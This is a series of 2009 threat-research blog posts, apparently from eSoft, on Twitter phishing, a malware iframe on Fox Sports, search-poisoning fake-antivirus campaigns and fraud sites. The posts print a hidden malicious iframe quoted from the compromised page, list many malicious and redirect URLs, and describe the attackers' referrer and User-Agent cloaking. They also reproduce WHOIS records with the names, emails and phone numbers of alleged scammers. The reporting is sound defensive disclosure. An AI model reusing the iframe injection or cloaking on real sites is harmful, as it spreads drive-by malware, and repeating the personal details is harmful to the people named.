Fresh Twitter Phishing Campaign via Direct Messages and Tweets

A fresh twitter phishing campaign is underway and using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on here” together with a link to a video. The URL hxxp://videos.dskjkiuw.com is one of the ones being used. At this time, eSoft is not detecting malware or exploits on this domain, but the target page presents a good imitation of the twitter login page in an attempt to steal credentials. As such, eSoft has flagged it as “Phishing & Fraud.” The Threat Prevention Team will keep a close eye on developments. Below is a series of screenshots starting with an example direct message and leading to the fake login page and the series of pages that come up after entering bogus username and password info.

Update on Fox Sports Website Infection

Quick update on this threat: as of today, 10/7/09, the Fox Sports website is still compromised. The specific URL, hxxp://msndr.foxsports.com/, has been cleaned, but any added nonsensical path results in a 404 page with the malicious iframe to thingre.com. For example, the hxxp://msndr.foxsports.com/dffdd results in a malicious page leading visitors to malware. eSoft has not received any response from Fox Sports and the classification of the msndr.foxsports.com host remains "Compromised."

Millions At Risk Visiting Popular Sports Site

The Fox Sports website remains infected and a risk to the 6m+ visitors ([popularity data] as reported by Compete). This website, ranked as the 75th most popular website in the United States and 311th most popular in the World according to Alexa [populartiy data] remains compromised and a major security risk to end-users. eSoft first reported on this threat on Friday, October 2nd, but was incorrect in saying that the infection was cleaned up. [Clarification: the specific pages eSoft examined were cleaned, but other pages have been discovered to still be compromised.] As of today, certain pages on the Fox Sports site remain infected. The eSoft team has written to the webmaster at Fox Sports (along with all contacts listed in their whois records) with some details that we hope will help their team clean up the website. When we hear back from them, we will post so here.

Note that the malware being delivered through this threat remains undetected by the vast majority of anti-virus software. Also note that the compromised pages are being served through the Akamai network although at this time we believe the threat is specific to Fox Sports and not Akamai. Here is part of the email sent to Fox Sports by the eSoft team:

To Whom It May Concern:

eSoft has detected that your website, msndr.foxsports.com, remains infected with a dangerous, hidden iframe that links to a site that uses a variety of exploits to infect your website visitors with one of several rotating trojans. In particular, your 404 Page Not Found page on that server has the iframe right at the end of the HTML document immediately before the </body> tag. See attached screenshot. Unfortunately, eSoft cannot say how your site was compromised, only that it is compromised and the compromised pages are being served through your Akamai distribution network. At this time, eSoft has marked msndr.foxports.com as a Compromised site and millions of end users are currently blocking access to the site based on that determination. Please let us know when you have corrected the issue so that we may unblock your site.

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again increased their tally of well known websites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.

The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.

The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same. 

Blackhats Quickly Saturate Google With Tropical Storm Ondoy

Since tropical storm Ondoy hit the Philippine Capital on Saturday, attackers have wasted no time planting malicious pages claiming to host videos of the historic disaster. The city of Manila saw flooding on a level that hasn't been seen in decades and the pictures are jaw dropping. But for surfers looking to see those videos, searching on Google and following search results can be dangerous.

The actual attack is nearly identical to the attack reported last week where pages are artificially inflated in PageRank, driving them to the top of the search results. In one case, 8 of the 10 top results were found to be malicious. The actual malicious pages are only served up when users come from Google and at this time, anti-virus coverage for the installed malware is very low.

Many of these search results will take the user directly to a Fake AV download while others are more stealthy.

One of the more covert sites is hxxp://www.kolonne.nl/links/1/typhoon-ondoy-update.php. When opened using Google the user is shown the movie window with a play button. The play button is actually a link to hxxp://mycompscanner.com/download.php?id=169.

The user is prompted to install a missing "Active-X Patch" to view the video which leads them to the final payload, Fake AV software. There is no mention of anti-virus software and the user is led to unwittingly install the malicious file.

When Google search was not used to access the page the video image and link to the malicious download did not appear.

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

This is one of many trending search terms being targeted, including the few examples below.

• Tim Tebow
• Jenny Slate
• Google Birthday
• Roman Polanski
• Yom Kippur
  

PageRank bombs using Google trending topics is one of the newest ways blackhats are spreading malware. The attackers are very responsive to the latest news and gossip, quickly posting new malicious sites to infect unsuspecting users.

Image Source: http://farm3.static.flickr.com/2555/3956145142_78422979bd.jpg

Google Users Targeted By New Malicious Websites

eSoft’s Threat Prevention Team has been tracking compromised sites that host PageRank Bombs since 2008.  The attacker hacks a site, but instead of putting exploits on the hacked site, they put links to other websites in order to boost the search result ranking on various search engines.  Initially this was being used for ad sites, porn sites, and pharmafraud sites.  Now, however, it is being used to boost the results of malicious sites, but with a new twist that targets Google users.

The sites whose search engine ranking is being boosted are now serving up malware through a complex series of redirects.  However, the redirects and the malware are only served up if the user gets to the site after clicking the link on Google.  Going directly to the malicious site (by pasting into your browser directly) results in a harmless page.

For example, using Google, a search for “nhl all-time scoring leaders” returns several malicious results on the first page (in the 5th, 6th, 7th, 8th and 10th positions). 

Going to the website, hxxp://adoptabeach.org/zzbtw/colzw/leaders.php, directly results in an innocuous page like this:

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

However, clicking the link in the Google search results will bring the user to a web site using a common Rogue Anti-Virus template that alerts the user that their PC is infected and prompts unsuspecting users to download what is really a Trojan:

The Trojan being downloaded at this point has only a 7% detection rate by anti-virus software with Microsoft, NOD32 and Panda detecting.

Some of the sites being used include:
hxxp://shanthkherath.com
hxxp://adoptabeach.org
hxxp://advertising-made-easy.com

These redirect through some URLs including:
hxxp://skystats1.net/in.cgi?9
hxxp://skystats1.net/redirect2/
http://jeremy-kyle-now.cn/go.php?id=2004&key=ff0057594&p=1

As far as eSoft’s TPT can tell, the referrer must have this string, google.com/search?q=, in it  and the User-Agent must indicate a Windows machine or the malware will not be delivered.  It does not appear that users of other search engines or operating systems are yet being targeted.

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs.  According to VirusTotal [http://www.virustotal.com/analisis/23c06523d4b5cf2c9e853bb5e7a20916e5246e81a17a39b9aad3f2f86056defd-1252440943], only two of forty-one anti-virus companies are currently detecting the malware. 

Credit also goes to Edgar (http://edetools.blogspot.com) who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).

hxxp://aljassmy.com/music/html/bmblog/britney-spears-chocho-a-lo-locco/.

Upon visiting the site, an obfuscated javascript file redirects the visitor to the one of several sites that host the malware payload.  Multiple redirect domains are being used to further obfuscate the final destination and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompts to download the supposed cure, which is in fact the malware.  This scheme is all too common and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August.  This latest appears to be the most widespread to date. 

The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.

Chinese Scams Resurface with New Branding

The Threat Prevention Team has found thousands of URLs and over 200 new domains registered to a group of Chinese scammers. The new sites are the same as the old, but with new branding and promotional products, such as "Acai Power Slim" "Pure Magnum Pro" and "Colo Cleanse Plus". This scam is perpetrated by sending spam messages advertising a "free trial" of the products. In the end, the criminals have made off with personal information, a credit card number and a recurring monthly charge.

Here is an example of an “Acai Power Slim” site. The pages are filled with bogus testimonials, citations from CBS and ABC News and clinical research. Also note the pressure to sign up for the "risk free trial."

As you dig through the site, you'll notice any meaningful way to contact the site owners has been removed. An email form is present which presumably will never be answered. All of the domains found match the previous pattern and have been registered to Chinese ownership.

DomainName : appleaboard.com

Creation Date ..................2009-08-19
Last Update Date ...............2009-08-24

Registrant Name .................FANG JUN
Registrant Organization .........FANG JUN
Registrant Address ..............JIANGYANGBERILI13
Registrant City..................YY
Registrant Province/State .......HN
Registrant Country Code .........CN
Registrant Postal Code ..........414039
Registrant Phone Number .........+86.073051421473
Registrant Fax ..................+86.073051421473
Registrant Email ................hiuaxiang@163.com

Expect to see an increase in spam associated with these domains over the next several weeks as the scammers attempt to lure people to these sites. eSoft is detecting these sites as "Phishing & Fraud."

Here is a sample list of the recently registered domains:

• appleaboard.com
• easyalong.com
• fasterdevelop.com
• pureacaisolution.com
• sunnyact.com

More information on this scam is available on Wikipedia http://spamtrackers.eu/wiki/index.php/Acai_Power_Slim

New Rash of Fraud Sites Touting Cheap Software

eSoft is researching a widespread and dangerous ring of fraudulent "OEM Software" distribution sites. These sites offer popular software from Microsoft, Adobe, and many other vendors at a greatly reduced price. Not only do they not deliver installable software, they collect sensitive information from individuals, including credit card numbers.

eSoft has identified over 11,000 of these web pages so far.

While these sites may look real, touting Microsoft and Verisign certifications, they are far from legitimate. Many of these sites come back as top results in Google and Yahoo searches. Alarmingly, many URL filters are NOT able to detect and block these sites.

Here is just one example of the many sites currently up and running. 

The company name given on many of these fraudulent sites is "OEM Downloads Inc", “Authorized Software Reseller” or “Download Software”. You can check for this at the bottom of the page where there is often a copyright notice. Throughout the sites there are tell-tale signs that this is a shady website that should not be trusted.

Straight from their FAQ..."you will not receive any printed documentation (licensing or instructions) - just files and instructions in .txt format, and will not be able to register this software online." This was the company's explanation for the low prices they are able to offer. If you are not able to register the product, it is not a real copy or you won’t be getting it in the first place.

Another sign is that they are offering Adobe Creative Suite software on the site. Adobe does not distribute or allow OEM distribution of their software. In fact, OEM software is rarely sold outside of a hardware bundle, like a new computer system.

Unsurprisingly, the whois information shows Russian ownership for most of these domains. For example:

------------------------------

WHOIS – COMPUTERCODEPLANET.COM

   Domain Name: COMPUTERCODEPLANET.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.ENCATGPC.COM
   Name Server: NS2.ENCATGPC.COM
   Status: ok
   Updated Date: 20-jul-2009
   Creation Date: 06-jan-2009
   Expiration Date: 06-jan-2010

Registrant:
         Valery Rigalo vrigalo77@inbox.ru +7.4999384712
         N/A
         Novomariinskaya str., 11/1, apt. 38
         Moscow,N/A,RU 193901


Domain Name:computercodeplanet.com
Record last updated at 2009-01-06 12:08:08
Record created on 2009/1/6
Record expired on 2010/1/6


Domain servers in listed order:
         ns1.encatgpc.com        ns2.encatgpc.com

------------------------------

The Threat Prevention Team has also noticed many compromised sites including some government and educational sites, are linking back to these domains. This further substantiates the criminal intentions of these fraudsters. eSoft is flagging these URLs as “Phishing & Fraud.”

Mass Compromise of Sites with Webalizer

The eSoft Threat Prevention Team has been tracking a rapidly growing pattern in website exploits over the last 24 hours. Since Thursday, Aug 20 eSoft has seen over 6,000 compromised URLs of the pattern:

http://www.example.com/webalizer/050709wareza/crack=28=keygen=serial.html

And the numbers are growing at a rate of several hundred per hour. A google search for inurl:050609wareza shows around 30,000 such compromised sites.

The compromised sites typically have nonsense text and a series of pictures of pills with links to more compromised sites and dangerous scripts that trigger well known exploits including the recent exploit of the ActiveX streaming video control, discussed in this eSoft security bulletin:

http://www.esoft.com/alerts/cve-2008-0015.cfm.


In some cases, such as when eSoft researchers tried navigating to a compromised site using Firefox on Windows, a redirection to files express occurs:


In testing, when the exploit is successful, it seems to be an information stealing Trojan, though the payload has varied. As the payloads seem to have weak coverage by AV companies and seem to be changing frequently, blocking the offending websites is the best solution for preventing infection.

eSoft’s threat prevention team notes that around 1/3 of the compromised sites include a webalizer directory, which may indicate a correlation with a recently published webalizer exploit. This exploit allows an attacker to execute arbitrary code, often with elevated privileges. More information on this exploit can be located below. It is recommended that administrators configure webalizer to not do reverse DNS lookups until a patch is released.

http://linuxdevcenter.com/pub/a/linux/2002/04/16/insecurities.html

eSoft will continue to cover this threat and continue to protect customers from these websites by flagging them as Compromised. At the start of research, Google had very few of these sites flagged as malicious, but it seems that increasing numbers are being identified by their cloud security as well. Other security engines tested including Web of Trust, Norman, and Mcafee SiteAdvisor have very poor detection of these sites at this time.